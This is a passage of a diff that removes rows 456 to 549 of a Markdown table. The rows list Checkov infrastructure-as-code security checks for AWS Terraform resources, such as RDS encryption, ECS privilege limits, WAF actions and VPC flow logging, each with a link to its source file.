-|  456 | CKV_AWS_325     | resource | aws_rds_cluster                                         | Ensure that RDS Cluster audit logging is enabled for MySQL engine                                                                                                                                        | Terraform | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py)                                                                           |
-|  457 | CKV_AWS_326     | resource | aws_rds_cluster                                         | Ensure that RDS Aurora Clusters have backtracking enabled                                                                                                                                                | Terraform | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py)                                                                     |
-|  458 | CKV_AWS_327     | resource | aws_rds_cluster                                         | Ensure RDS Clusters are encrypted using KMS CMKs                                                                                                                                                         | Terraform | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py)                                                                   |
-|  459 | CKV_AWS_328     | resource | aws_alb                                                 | Ensure that ALB is configured with defensive or strictest desync mitigation mode                                                                                                                         | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py)                                                                                             |
-|  460 | CKV_AWS_328     | resource | aws_elb                                                 | Ensure that ALB is configured with defensive or strictest desync mitigation mode                                                                                                                         | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py)                                                                                             |
-|  461 | CKV_AWS_328     | resource | aws_lb                                                  | Ensure that ALB is configured with defensive or strictest desync mitigation mode                                                                                                                         | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py)                                                                                             |
-|  462 | CKV_AWS_329     | resource | aws_efs_access_point                                    | EFS access points should enforce a root directory                                                                                                                                                        | Terraform | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py)                                                                                   |
-|  463 | CKV_AWS_330     | resource | aws_efs_access_point                                    | EFS access points should enforce a user identity                                                                                                                                                         | Terraform | [EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py)                                                                             |
-|  464 | CKV_AWS_331     | resource | aws_ec2_transit_gateway                                 | Ensure Transit Gateways do not automatically accept VPC attachment requests                                                                                                                              | Terraform | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py)                                                                 |
-|  465 | CKV_AWS_332     | resource | aws_ecs_service                                         | Ensure ECS Fargate services run on the latest Fargate platform version                                                                                                                                   | Terraform | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py)                                                                         |
-|  466 | CKV_AWS_333     | resource | aws_ecs_service                                         | Ensure ECS services do not have public IP addresses assigned to them automatically                                                                                                                       | Terraform | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py)                                                                                   |
-|  467 | CKV_AWS_334     | resource | aws_ecs_task_definition                                 | Ensure ECS containers should run as non-privileged                                                                                                                                                       | Terraform | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py)                                                                             |
-|  468 | CKV_AWS_335     | resource | aws_ecs_task_definition                                 | Ensure ECS task definitions should not share the host's process namespace                                                                                                                                | Terraform | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py)                                                                         |
-|  469 | CKV_AWS_336     | resource | aws_ecs_task_definition                                 | Ensure ECS containers are limited to read-only access to root filesystems                                                                                                                                | Terraform | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py)                                                                       |
-|  470 | CKV_AWS_337     | resource | aws_ssm_parameter                                       | Ensure SSM parameters are using KMS CMK                                                                                                                                                                  | Terraform | [SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py)                                                                                 |
-|  471 | CKV_AWS_338     | resource | aws_cloudwatch_log_group                                | Ensure CloudWatch log groups retains logs for at least 1 year                                                                                                                                            | Terraform | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py)                                                         |
-|  472 | CKV_AWS_339     | resource | aws_eks_cluster                                         | Ensure EKS clusters run on a supported Kubernetes version                                                                                                                                                | Terraform | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py)                                                                                   |
-|  473 | CKV_AWS_340     | resource | aws_elastic_beanstalk_environment                       | Ensure Elastic Beanstalk managed platform updates are enabled                                                                                                                                            | Terraform | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py)                                                     |
-|  474 | CKV_AWS_341     | resource | aws_launch_configuration                                | Ensure Launch template should not have a metadata response hop limit greater than 1                                                                                                                      | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py)                                                                     |
-|  475 | CKV_AWS_341     | resource | aws_launch_template                                     | Ensure Launch template should not have a metadata response hop limit greater than 1                                                                                                                      | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py)                                                                     |
-|  476 | CKV_AWS_342     | resource | aws_waf_rule_group                                      | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                               |
-|  477 | CKV_AWS_342     | resource | aws_waf_web_acl                                         | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                               |
-|  478 | CKV_AWS_342     | resource | aws_wafregional_rule_group                              | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                               |
-|  479 | CKV_AWS_342     | resource | aws_wafregional_web_acl                                 | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                               |
-|  480 | CKV_AWS_342     | resource | aws_wafv2_rule_group                                    | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                               |
-|  481 | CKV_AWS_342     | resource | aws_wafv2_web_acl                                       | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                               |
-|  482 | CKV_AWS_343     | resource | aws_redshift_cluster                                    | Ensure Amazon Redshift clusters should have automatic snapshots enabled                                                                                                                                  | Terraform | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py)                                                                         |
-|  483 | CKV_AWS_344     | resource | aws_networkfirewall_firewall                            | Ensure that Network firewalls have deletion protection enabled                                                                                                                                           | Terraform | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py)                                                     |
-|  484 | CKV_AWS_345     | resource | aws_networkfirewall_firewall                            | Ensure that Network firewall encryption is via a CMK                                                                                                                                                     | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py)                                                                           |
-|  485 | CKV_AWS_345     | resource | aws_networkfirewall_rule_group                          | Ensure that Network firewall encryption is via a CMK                                                                                                                                                     | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py)                                                                           |
-|  486 | CKV_AWS_346     | resource | aws_networkfirewall_firewall_policy                     | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK)                                                                                                | Terraform | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py)                                                         |
-|  487 | CKV_AWS_347     | resource | aws_neptune_cluster                                     | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                    | Terraform | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py)                                                           |
-|  488 | CKV_AWS_348     | resource | aws_iam_access_key                                      | Ensure IAM root user doesnt have Access keys                                                                                                                                                             | Terraform | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py)                                                                             |
-|  489 | CKV_AWS_349     | resource | aws_emr_security_configuration                          | Ensure EMR Cluster security configuration encrypts local disks                                                                                                                                           | Terraform | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py)                                                         |
-|  490 | CKV_AWS_350     | resource | aws_emr_security_configuration                          | Ensure EMR Cluster security configuration encrypts EBS disks                                                                                                                                             | Terraform | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py)                                                                     |
-|  491 | CKV_AWS_351     | resource | aws_emr_security_configuration                          | Ensure EMR Cluster security configuration encrypts InTransit                                                                                                                                             | Terraform | [EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py)                                                         |
-|  492 | CKV_AWS_352     | resource | aws_network_acl_rule                                    | Ensure NACL ingress does not allow all Ports                                                                                                                                                             | Terraform | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py)                                                                           |
-|  493 | CKV_AWS_353     | resource | aws_db_instance                                         | Ensure that RDS instances have performance insights enabled                                                                                                                                              | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py)                                                           |
-|  494 | CKV_AWS_353     | resource | aws_rds_cluster_instance                                | Ensure that RDS instances have performance insights enabled                                                                                                                                              | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py)                                                           |
-|  495 | CKV_AWS_354     | resource | aws_db_instance                                         | Ensure RDS Performance Insights are encrypted using KMS CMKs                                                                                                                                             | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py)                                       |
-|  496 | CKV_AWS_354     | resource | aws_rds_cluster_instance                                | Ensure RDS Performance Insights are encrypted using KMS CMKs                                                                                                                                             | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py)                                       |
-|  497 | CKV_AWS_355     | resource | aws_iam_group_policy                                    | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                             |
-|  498 | CKV_AWS_355     | resource | aws_iam_policy                                          | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                             |
-|  499 | CKV_AWS_355     | resource | aws_iam_role_policy                                     | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                             |
-|  500 | CKV_AWS_355     | resource | aws_iam_user_policy                                     | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                             |
-|  501 | CKV_AWS_355     | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                             |
-|  502 | CKV_AWS_356     | data     | aws_iam_policy_document                                 | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py)                                                                               |
-|  503 | CKV_AWS_357     | resource | aws_transfer_server                                     | Ensure Transfer Server allows only secure protocols                                                                                                                                                      | Terraform | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py)                                         |
-|  504 | CKV_AWS_358     | data     | aws_iam_policy_document                                 | Ensure GitHub Actions OIDC trust policies only allows actions from a specific known organization                                                                                                         | Terraform | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py)                                                                   |
-|  505 | CKV_AWS_359     | resource | aws_neptune_cluster                                     | Neptune DB clusters should have IAM database authentication enabled                                                                                                                                      | Terraform | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py)                     |
-|  506 | CKV_AWS_360     | resource | aws_docdb_cluster                                       | Ensure DocumentDB has an adequate backup retention period                                                                                                                                                | Terraform | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py)                                                                               |
-|  507 | CKV_AWS_361     | resource | aws_neptune_cluster                                     | Ensure that Neptune DB cluster has automated backups enabled with adequate retention                                                                                                                     | Terraform | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py)                                                             |
-|  508 | CKV_AWS_362     | resource | aws_neptune_cluster                                     | Neptune DB clusters should be configured to copy tags to snapshots                                                                                                                                       | Terraform | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py)                                               |
-|  509 | CKV_AWS_363     | resource | aws_lambda_function                                     | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Terraform | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                         |
-|  510 | CKV_AWS_364     | resource | aws_lambda_permission                                   | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount                                                                                          | Terraform | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py)                                                                         |
-|  511 | CKV_AWS_365     | resource | aws_ses_configuration_set                               | Ensure SES Configuration Set enforces TLS usage                                                                                                                                                          | Terraform | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py)                                                             |
-|  512 | CKV2_AWS_1      | resource | aws_network_acl                                         | Ensure that all NACL are attached to subnets                                                                                                                                                             | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml)                                                                                       |
-|  513 | CKV2_AWS_1      | resource | aws_subnet                                              | Ensure that all NACL are attached to subnets                                                                                                                                                             | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml)                                                                                       |
-|  514 | CKV2_AWS_2      | resource | aws_ebs_volume                                          | Ensure that only encrypted EBS volumes are attached to EC2 instances                                                                                                                                     | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml)                                     |
-|  515 | CKV2_AWS_2      | resource | aws_volume_attachment                                   | Ensure that only encrypted EBS volumes are attached to EC2 instances                                                                                                                                     | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml)                                     |
-|  516 | CKV2_AWS_3      | resource | aws_guardduty_detector                                  | Ensure GuardDuty is enabled to specific org/region                                                                                                                                                       | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml)                                                                           |
-|  517 | CKV2_AWS_3      | resource | aws_guardduty_organization_configuration                | Ensure GuardDuty is enabled to specific org/region                                                                                                                                                       | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml)                                                                           |
-|  518 | CKV2_AWS_4      | resource | aws_api_gateway_method_settings                         | Ensure API Gateway stage have logging level defined as appropriate                                                                                                                                       | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml)                                             |
-|  519 | CKV2_AWS_4      | resource | aws_api_gateway_stage                                   | Ensure API Gateway stage have logging level defined as appropriate                                                                                                                                       | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml)                                             |
-|  520 | CKV2_AWS_5      | resource | aws_security_group                                      | Ensure that Security Groups are attached to another resource                                                                                                                                             | Terraform | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml)                                                                       |
-|  521 | CKV2_AWS_6      | resource | aws_s3_bucket                                           | Ensure that S3 bucket has a Public Access block                                                                                                                                                          | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml)                                                       |
-|  522 | CKV2_AWS_6      | resource | aws_s3_bucket_public_access_block                       | Ensure that S3 bucket has a Public Access block                                                                                                                                                          | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml)                                                       |
-|  523 | CKV2_AWS_7      | resource | aws_emr_cluster                                         | Ensure that Amazon EMR clusters' security groups are not open to the world                                                                                                                               | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml)                                                       |
-|  524 | CKV2_AWS_7      | resource | aws_security_group                                      | Ensure that Amazon EMR clusters' security groups are not open to the world                                                                                                                               | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml)                                                       |
-|  525 | CKV2_AWS_8      | resource | aws_rds_cluster                                         | Ensure that RDS clusters has backup plan of AWS Backup                                                                                                                                                   | Terraform | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml)                                                                 |
-|  526 | CKV2_AWS_9      | resource | aws_backup_selection                                    | Ensure that EBS are added in the backup plans of AWS Backup                                                                                                                                              | Terraform | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml)                                                                                   |
-|  527 | CKV2_AWS_10     | resource | aws_cloudtrail                                          | Ensure CloudTrail trails are integrated with CloudWatch Logs                                                                                                                                             | Terraform | [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml)                                                                 |
-|  528 | CKV2_AWS_11     | resource | aws_vpc                                                 | Ensure VPC flow logging is enabled in all VPCs                                                                                                                                                           | Terraform | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml)                                                                                     |
-|  529 | CKV2_AWS_12     | resource | aws_default_security_group                              | Ensure the default security group of every VPC restricts all traffic                                                                                                                                     | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml)                                                                           |
-|  530 | CKV2_AWS_12     | resource | aws_vpc                                                 | Ensure the default security group of every VPC restricts all traffic                                                                                                                                     | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml)                                                                           |
-|  531 | CKV2_AWS_14     | resource | aws_iam_group                                           | Ensure that IAM groups includes at least one IAM user                                                                                                                                                    | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml)                                                             |
-|  532 | CKV2_AWS_14     | resource | aws_iam_group_membership                                | Ensure that IAM groups includes at least one IAM user                                                                                                                                                    | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml)                                                             |
-|  533 | CKV2_AWS_15     | resource | aws_autoscaling_group                                   | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks.                                                                                 | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml)                                                                   |
-|  534 | CKV2_AWS_15     | resource | aws_elb                                                 | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks.                                                                                 | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml)                                                                   |
-|  535 | CKV2_AWS_15     | resource | aws_lb_target_group                                     | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks.                                                                                 | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml)                                                                   |
-|  536 | CKV2_AWS_16     | resource | aws_appautoscaling_target                               | Ensure that Auto Scaling is enabled on your DynamoDB tables                                                                                                                                              | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml)                                             |
-|  537 | CKV2_AWS_16     | resource | aws_dynamodb_table                                      | Ensure that Auto Scaling is enabled on your DynamoDB tables                                                                                                                                              | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml)                                             |
-|  538 | CKV2_AWS_18     | resource | aws_backup_selection                                    | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup                                                                                                    | Terraform | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml)                                                                                   |
-|  539 | CKV2_AWS_19     | resource | aws_eip                                                 | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances                                                                                                                           | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml)                                                       |
-|  540 | CKV2_AWS_19     | resource | aws_eip_association                                     | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances                                                                                                                           | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml)                                                       |
-|  541 | CKV2_AWS_20     | resource | aws_alb                                                 | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                 |
-|  542 | CKV2_AWS_20     | resource | aws_alb_listener                                        | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                 |
-|  543 | CKV2_AWS_20     | resource | aws_lb                                                  | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                 |
-|  544 | CKV2_AWS_20     | resource | aws_lb_listener                                         | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                 |
-|  545 | CKV2_AWS_21     | resource | aws_iam_group_membership                                | Ensure that all IAM users are members of at least one IAM group.                                                                                                                                         | Terraform | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml)                                             |
-|  546 | CKV2_AWS_22     | resource | aws_iam_user                                            | Ensure an IAM User does not have access to the console                                                                                                                                                   | Terraform | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml)                                                             |
-|  547 | CKV2_AWS_23     | resource | aws_route53_record                                      | Route53 A Record has Attached Resource                                                                                                                                                                   | Terraform | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml)                                                   |
-|  548 | CKV2_AWS_27     | resource | aws_rds_cluster                                         | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled                                                                                                                                         | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml)                                             |
-|  549 | CKV2_AWS_27     | resource | aws_rds_cluster_parameter_group                         | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled                                                                                                                                         | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml)                                             |
